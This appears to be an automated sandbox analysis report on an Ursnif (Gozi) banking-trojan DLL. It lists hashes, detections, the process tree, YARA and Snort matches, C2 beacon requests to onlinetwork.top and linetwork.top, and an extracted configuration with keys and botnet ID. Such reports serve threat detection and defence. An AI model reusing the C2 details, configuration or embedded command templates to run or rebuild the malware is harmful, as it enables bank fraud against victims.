Windows Analysis Report
ursnif_IAT_corrected.exe.dll

Overview

General Information

Sample Name: ursnif_IAT_corrected.exe.dll
Analysis ID: 727158
MD5: 8b52c277c63c5877c0e4ca32d1458957
SHA1: 1d64f4610c6e0af8a3e3a9d8e8b794fc1bebeef5
SHA256: 8d2f90927603c33947463dc9846dc1b7a220ea1f13dc1a0ccfe538d5f83bbfe2
Tags: dll, ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected Ursnif
Antivirus / Scanner detection for submitted sample
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Writes or reads registry keys via WMI
Found API chain indicative of debugger detection
Machine Learning detection for sample
Found evasive API chain (may stop execution after checking system information)
Writes registry values via WMI
Uses 32bit PE files
Yara signature match
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Found evasive API chain checking for process token information
Registers a DLL
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • loaddll32.exe (PID: 4124 cmdline: loaddll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll" MD5: 1F562FBF37040EC6C43C8D5EF619EA39)
    • conhost.exe (PID: 5520 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5080 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 5020 cmdline: rundll32.exe "C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • regsvr32.exe (PID: 5216 cmdline: regsvr32.exe /s C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
    • rundll32.exe (PID: 780 cmdline: rundll32.exe C:\Users\user\Desktop\ursnif_IAT_corrected.exe.dll,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup
{"RSA Public Key": "oZWPUqrPbA1nh5KeblvW58CGuN1e4qDR3J71aATar5O00raqKE8xUkhFQUaw8R0BlZUnpL1tyzW+efqFkhCLYWrMw9nZJeYEd473/0tPEq2VGwv1oB9Pv2/fdgDd6u50PW0dH+R3uMkcvvSQWa4B8bKoi7inCm10C8UL7vaPiLpNIvtqiX4DmnU8XJVFUqOUDuOPHQVcBCPrZcWDAnVXnLWrHhRfXLI5WYFsVRJSde33pVRkM7XdYHtOhkTQlmghQJYxytxJ0sf95vDL6iv7epWQHBvzkG4uQNqLKhs25dvCXYJYNvjJXuqOqa9OkYezI8hW7hiiyxvLszulw2SxcIP0Ki+iShbrMtTsnnUoNQ4=", "c2_domain": ["config.edge.skype.com", "onlinetwork.top", "linetwork.top"], "botnet": "5000", "server": "50", "serpent_key": "7Lmoq8QMk7P7gY63", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
Source | Rule | Description | Author | Strings
ursnif_IAT_corrected.exe.dll | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security

Source | Rule | Description | Author | Strings
00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Gozi_fd494041 | unknown | unknown
  • 0xff0:$a1: /C ping localhost -n %u && del "%s"
  • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
  • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
  • 0xca8:$a5: filename="%.4u.%lu"
  • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
  • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xe72:$a9: &whoami=%s
  • 0xe5a:$a10: %u.%u_%u_%u_x%u
  • 0xc22:$a11: size=%u&hash=0x%08x
  • 0xc13:$a12: &uptime=%u
  • 0xda7:$a13: %systemroot%\system32\c_1252.nls
  • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Gozi_261f5ac5 | unknown | unknown
  • 0xbd3:$a1: soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x
  • 0x803:$a2: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
  • 0xc74:$a3: Content-Disposition: form-data; name="upload_file"; filename="%.4u.%lu"
  • 0xafa:$a5: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT %u.%u%s)
  • 0xd4b:$a9: Software\AppDataLow\Software\Microsoft\
  • 0x1c68:$a9: Software\AppDataLow\Software\Microsoft\
00000003.00000003.354187401.0000000004F88000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security
00000003.00000003.354187401.0000000004F88000.00000004.00000020.00020000.00000000.sdmp | Windows_Trojan_Gozi_fd494041 | unknown | unknown
  • 0xff0:$a1: /C ping localhost -n %u && del "%s"
  • 0xf20:$a2: /C "copy "%s" "%s" /y && "%s" "%s"
  • 0xec8:$a3: /C "copy "%s" "%s" /y && rundll32 "%s",%S"
  • 0xca8:$a5: filename="%.4u.%lu"
  • 0x803:$a7: version=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s
  • 0x63a:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xa41:$a8: %08X-%04X-%04X-%04X-%08X%04X
  • 0xe72:$a9: &whoami=%s
  • 0xe5a:$a10: %u.%u_%u_%u_x%u
  • 0xc22:$a11: size=%u&hash=0x%08x
  • 0xc13:$a12: &uptime=%u
  • 0xda7:$a13: %systemroot%\system32\c_1252.nls
  • 0x1416:$a14: IE10RunOnceLastShown_TIMESTAMP
(table truncated; 119 entries in total)

Source | Rule | Description | Author | Strings
0.2.loaddll32.exe.13794a0.1.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
4.2.rundll32.exe.10000000.2.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
3.2.regsvr32.exe.10000000.2.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
3.2.regsvr32.exe.4a494a0.1.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
4.2.rundll32.exe.49b94a0.1.raw.unpack | JoeSecurity_Ursnif_1 | Yara detected Ursnif | Joe Security
(table truncated; 7 entries in total)

No Sigma rule has matched
Timestamp | Source | Destination | Protocol | SID | Classtype
10/21/22-00:25:18.871319 | 192.168.2.4:49715 | 13.107.42.16:80 | TCP | 2033204 | A Network Trojan was detected
10/21/22-00:27:40.718067 | 192.168.2.4:49747 | 13.107.42.16:80 | TCP | 2033204 | A Network Trojan was detected
10/21/22-00:25:20.730105 | 192.168.2.4:49718 | 13.107.42.16:80 | TCP | 2033204 | A Network Trojan was detected
10/21/22-00:27:40.718067 | 192.168.2.4:49747 | 13.107.42.16:80 | TCP | 2033203 | A Network Trojan was detected
10/21/22-00:27:12.300672 | 192.168.2.4:49742 | 62.173.145.183:80 | TCP | 2033203 | A Network Trojan was detected
10/21/22-00:27:12.300672 | 192.168.2.4:49742 | 62.173.145.183:80 | TCP | 2033204 | A Network Trojan was detected
10/21/22-00:25:09.002887 | 192.168.2.4:49711 | 13.107.42.16:80 | TCP | 2033203 | A Network Trojan was detected
10/21/22-00:25:29.478642 | 192.168.2.4:59444 | 8.8.8.8:53 | UDP | 2023883 | Potentially Bad Traffic
10/21/22-00:25:09.002887 | 192.168.2.4:49711 | 13.107.42.16:80 | TCP | 2033204 | A Network Trojan was detected
10/21/22-00:27:11.884556 | 192.168.2.4:58914 | 8.8.8.8:53 | UDP | 2023883 | Potentially Bad Traffic
10/21/22-00:25:23.881073 | 192.168.2.4:49719 | 13.107.42.16:80 | TCP | 2033203 | A Network Trojan was detected
10/21/22-00:27:20.607846 | 192.168.2.4:49743 | 62.173.145.183:80 | TCP | 2033203 | A Network Trojan was detected
10/21/22-00:27:20.607846 | 192.168.2.4:49743 | 62.173.145.183:80 | TCP | 2033204 | A Network Trojan was detected
10/21/22-00:27:22.814108 | 192.168.2.4:49744 | 62.173.145.183:80 | TCP | 2033204 | A Network Trojan was detected
10/21/22-00:27:42.910400 | 192.168.2.4:49748 | 13.107.42.16:80 | TCP | 2033203 | A Network Trojan was detected
10/21/22-00:27:32.445316 | 192.168.2.4:49746 | 13.107.42.16:80 | TCP | 2033204 | A Network Trojan was detected
10/21/22-00:27:42.910400 | 192.168.2.4:49748 | 13.107.42.16:80 | TCP | 2033204 | A Network Trojan was detected
10/21/22-00:27:22.814108 | 192.168.2.4:49744 | 62.173.145.183:80 | TCP | 2033203 | A Network Trojan was detected
10/21/22-00:27:25.963477 | 192.168.2.4:49745 | 62.173.145.183:80 | TCP | 2033204 | A Network Trojan was detected

                  AV Detection

Source: ursnif_IAT_corrected.exe.dll | Virustotal: Detection: 55%
Source: ursnif_IAT_corrected.exe.dll | Avira: detected
Source: linetwork.top | Virustotal: Detection: 12%
Source: onlinetwork.top | Virustotal: Detection: 12%
Source: http://onlinetwork.top/ | Virustotal: Detection: 12%
Source: ursnif_IAT_corrected.exe.dll | Joe Sandbox ML: detected
Source: ursnif_IAT_corrected.exe.dll | Malware Configuration Extractor: Ursnif {"RSA Public Key": "oZWPUqrPbA1nh5KeblvW58CGuN1e4qDR3J71aATar5O00raqKE8xUkhFQUaw8R0BlZUnpL1tyzW+efqFkhCLYWrMw9nZJeYEd473/0tPEq2VGwv1oB9Pv2/fdgDd6u50PW0dH+R3uMkcvvSQWa4B8bKoi7inCm10C8UL7vaPiLpNIvtqiX4DmnU8XJVFUqOUDuOPHQVcBCPrZcWDAnVXnLWrHhRfXLI5WYFsVRJSde33pVRkM7XdYHtOhkTQlmghQJYxytxJ0sf95vDL6iv7epWQHBvzkG4uQNqLKhs25dvCXYJYNvjJXuqOqa9OkYezI8hW7hiiyxvLszulw2SxcIP0Ki+iShbrMtTsnnUoNQ4=", "c2_domain": ["config.edge.skype.com", "onlinetwork.top", "linetwork.top"], "botnet": "5000", "server": "50", "serpent_key": "7Lmoq8QMk7P7gY63", "sleep_time": "1", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0"}
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_02AF47E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 4_2_02E347E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
Source: C:\Windows\SysWOW64\rundll32.exe | Code function: 5_2_045E47E5 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,
Source: ursnif_IAT_corrected.exe.dll | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL

                  Networking

Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 62.173.145.183 80
Source: C:\Windows\SysWOW64\regsvr32.exe | Domain query: onlinetwork.top
Source: C:\Windows\SysWOW64\rundll32.exe | Network Connect: 31.41.44.194 80
Source: C:\Windows\SysWOW64\regsvr32.exe | Domain query: linetwork.top
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49711 -> 13.107.42.16:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49711 -> 13.107.42.16:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49715 -> 13.107.42.16:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49718 -> 13.107.42.16:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49719 -> 13.107.42.16:80
Source: Traffic | Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.4:59444 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2023883 ET DNS Query to a *.top domain - Likely Hostile 192.168.2.4:58914 -> 8.8.8.8:53
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49742 -> 62.173.145.183:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49742 -> 62.173.145.183:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49743 -> 62.173.145.183:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49743 -> 62.173.145.183:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49744 -> 62.173.145.183:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49744 -> 62.173.145.183:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49745 -> 62.173.145.183:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49746 -> 13.107.42.16:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49747 -> 13.107.42.16:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49747 -> 13.107.42.16:80
Source: Traffic | Snort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49748 -> 13.107.42.16:80
Source: Traffic | Snort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49748 -> 13.107.42.16:80
Source: Joe Sandbox View | ASN Name: SPACENET-ASInternetServiceProviderRU
Source: Joe Sandbox View | ASN Name: ASRELINKRU
Source: global traffic | HTTP traffic detected: GET /drew/fJ29sqPsP/PB4FnwvByjBglXFYEjZ1/hXe9prWt3B5GwuDq98v/uxK6HJV9Vv2hGb4_2BzE87/_2B7cwHJr4KZl/Z2JNy_2F/FQTy6SE98GzpaP4OycRAbeK/FNb75e_2BZ/vDSt33A5GpRAp0Wp5/3sRCo7L7mC_2/FRcDNZgk7ge/0DV7I1SHotZIJK/MawMR4TykLq9DH4qoWZqU/9lh5zRf0UXFuxlAr/44doOlzEgahzUed/pTo7pwfqznm_2FNsdD/ONqwlJdhn/hTW0RFx_2FoxngXj4_2B/7VTtckioJ/RQjhyCJh.jlk HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: linetwork.top | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /drew/bBjIYvLPS6LWM/5hSIaVH5/Wq734Z_2BJdIJMJo3F9GITO/_2FcMitcTe/kWvqzZ_2B_2FKKbPA/PasXIoBqTiXU/g_2FlZW7Y_2/B41HTf6QrjFt_2/BVrbTt4PzlSq49i2n_2Bd/eYvDRtuGLt_2Fv6B/tiuwwj_2BAQltrY/i8qwn6NTmmAuX65G3U/G0pEw9pKd/5FnOrAI7ls4u0lmSvnEp/39rOvZP_2BCYyBu8UVC/tWjDwJwf88LN44CDcCSZK_/2BvPg5_2BjQiD/eLQzVCVR/WPugjRuufv7WeRl3hdeCsRv/aT5ChRiLQy/6L.jlk HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: linetwork.top | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /drew/NXo6zedpn_2B_/2BcanAQX/FnyJMATt_2F48kv6_2FGokp/FknJiZ4BPO/rcHYyBUZQ99j1sGoQ/3iqH_2FJ2MwI/44xXh3ewHre/Z3uYW8oE7cSgpQ/KoDoLpaNqGjAzcl7PDDtU/W4U8yO0BLXfpg6Fg/1LkQrB_2FwF36_2/F24Alce0F3ZIABc8fP/582wfkRmY/YYSggLyv6WiREP5aRpD7/BrtAiO3VnPYflPLClgV/qChVx2f_2BaPtkYL4DoePx/ugW_2FeHancyO/tXrlnouq/Hh9J5BBA0FEI0HWw67W05n9/zd1N.jlk HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: linetwork.top | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic | HTTP traffic detected: GET /drew/cLUzScwIGd6lPZFBgwJAB/boGs7r3rpKnEEW26/IZwhyzcbrBr1vrh/pacdkNsvfXz_2BJd7M/nIUnH5UJy/lraLufWTWWuSthVJSQnB/skwB6_2F4mYx1hncPnC/DX7TcGWo1RJRVk4zslIVLg/yTztrtFucPEpP/M0MfTI80/ZOv2XL0MhanRoGMyGX9uAoo/dmIzHKJR6c/gnzW6jLfOR7yWUymL/vvx15g4IZ4jD/aDLfgoeX_2F/HE40tKUB0xmnED/5US9_2FwaFREdIsGRoa7p/JuiKle06sqYmlLWx/l.jlk HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) | Host: linetwork.top | Connection: Keep-Alive | Cache-Control: no-cache
Source: rundll32.exe, 00000004.00000003.608109363.0000000002E94000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817171123.0000000002E95000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://config.ed4
Source: rundll32.exe, 00000004.00000003.608109363.0000000002E94000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817171123.0000000002E95000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://config.edge.skype
Source: rundll32.exe, 00000004.00000002.817297362.0000000002EC5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://config.edge.skype.com/
Source: regsvr32.exe, 00000003.00000002.817169854.0000000002B81000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://config.edge.skype.com/drew/PS2yhImkf/WUfx3th5Boa7ltUMwMtx/yWw24ht9TmQzrZJd3f7/J6v0UwdZxUlWdBE
Source: regsvr32.exe, 00000003.00000003.615051454.0000000002B71000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://config.edge.skype.com/drew/m7TsF_2BzBjOID/ubqoU4I8FDNox2Pjk9c8A/V6pB6NWoxVj8rIbr/Z2mudDVWbTE4
Source: rundll32.exe, 00000004.00000002.817171123.0000000002E95000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://config.edge.skype.com/drew/uMeu18bcwP4rXMlifz6Q2/6Hy8MUrv67vFVnMI/nOHGGP0ADwhulYb/27ZJOLUh406
Source: rundll32.exe, 00000004.00000002.817212768.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://config.edge.skype.com/drew/xnjpjMCMe2_2BcaLBxlal/IEyR7r9yGjIMn5iD/iXB1XVZ1XOEDbhK/s9wDAd9rC3K
Source: rundll32.exe, 00000004.00000002.817212768.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://config.edge.skype.com/p
Source: rundll32.exe, 00000004.00000003.608125586.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817212768.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817112343.0000000002E76000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://linetwork.top/
Source: rundll32.exe, 00000004.00000003.608139585.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://linetwork.top/7
Source: rundll32.exe, 00000004.00000003.608109363.0000000002E94000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817171123.0000000002E95000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817003382.0000000002E40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://linetwork.top/drew/NXo6zedpn_2B_/2BcanAQX/FnyJMATt_2F48kv6_2FGokp/FknJiZ4BPO/rcHYyBUZQ99j1sGo
Source: regsvr32.exe, 00000003.00000003.615051454.0000000002B71000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://linetwork.top/drew/cLUzScwIGd6lPZFBgwJAB/boGs7r3rpKnEEW26/IZwhyzcbrBr1vrh/pacdkNsvfXz_2BJd7M/
Source: regsvr32.exe, 00000003.00000003.615119181.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.817169854.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.608125586.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817212768.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://onlinetwork.top/
Source: regsvr32.exe, 00000003.00000003.615119181.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.817169854.0000000002B81000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://onlinetwork.top/)
Source: rundll32.exe, 00000004.00000003.608125586.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817212768.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://onlinetwork.top/M
Source: rundll32.exe, 00000004.00000002.817262107.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.608139585.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.608125586.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817212768.0000000002EA4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://onlinetwork.top/drew/fkPc2r0gVHV/J_2FZDZ2sHG5ME/g7AZzNZ7pG5EAQpQ0yMPw/2o1hBcleFqeXJ_2F/_2BIHR
Source: rundll32.exe, 00000004.00000002.817078743.0000000002E65000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.817003382.0000000002E40000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://onlinetwork.top/drew/pkd6zgqwUDZasB/ZfiTcB208ordqnfSoXwRp/L_2FtDxOUhf3arTi/7kXxmpxOwIKTj9W/FF
Source: regsvr32.exe, 00000003.00000003.615119181.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.817106892.0000000002B59000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.817169854.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.615051454.0000000002B71000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://onlinetwork.top/drew/rlvNc0Gi62Z2w3Lq/XhEo009f5SrCecB/UqNEgSpKb_2FxSk3FP/SwVmULm50/faoxFounD5
Source: regsvr32.exe, 00000003.00000002.817169854.0000000002B81000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.816986286.0000000002B1A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://onlinetwork.top/drew/u5bDuKFkXxAro/J7u_2BcQ/WcM5Uj0RwbHtvwyTUfix6_2/BcSLCk9FBn/ntIlUfYV61xDv7
Source: rundll32.exe, 00000005.00000002.817185971.0000000002E0C000.00000004.00000010.00020000.00000000.sdmp | String found in binary or memory: http://onlinetwork.top/drew/wmWOP2SQu9/lkwlizEoFo7LtzQm_/2FQKnjOJS7Fs/1omPLrC4w2x/K
Source: unknown | DNS traffic detected: queries for: onlinetwork.top
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 3_2_02AF4F4B ResetEvent,ResetEvent,InternetReadFile,GetLastError,ResetEvent,InternetReadFile,GetLastError,

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Source: Yara matchFile source: 00000004.00000003.347389084.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000003.354187401.0000000004F88000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322255740.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322346163.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.347438026.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000003.347208366.0000000004EA8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000003.322130590.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343566603.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.343497649.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: loaddll32.exe PID: 4124, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: regsvr32.exe PID: 5216, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 5020, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 780, type: MEMORYSTR
Source: Yara match, File source: ursnif_IAT_corrected.exe.dll, type: SAMPLE
Source: Yara match, File source: 0.2.loaddll32.exe.13794a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.regsvr32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.regsvr32.exe.4a494a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.rundll32.exe.49b94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.rundll32.exe.4b094a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.rundll32.exe.2e30000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.loaddll32.exe.7f0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.rundll32.exe.45e0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.loaddll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.regsvr32.exe.2af0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE

                  E-Banking Fraud

Source: Yara match, File source: Process Memory Space: loaddll32.exe PID: 4124, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: regsvr32.exe PID: 5216, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 5020, type: MEMORYSTR
Source: Yara match, File source: Process Memory Space: rundll32.exe PID: 780, type: MEMORYSTR
Source: Yara match, File source: ursnif_IAT_corrected.exe.dll, type: SAMPLE
Source: Yara match, File source: 0.2.loaddll32.exe.13794a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.rundll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.regsvr32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.regsvr32.exe.4a494a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.rundll32.exe.49b94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.rundll32.exe.4b094a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match, File source: 4.2.rundll32.exe.2e30000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.loaddll32.exe.7f0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 5.2.rundll32.exe.45e0000.0.unpack, type: UNPACKEDPE
Source: Yara match, File source: 0.2.loaddll32.exe.10000000.2.unpack, type: UNPACKEDPE
Source: Yara match, File source: 3.2.regsvr32.exe.2af0000.0.unpack, type: UNPACKEDPE
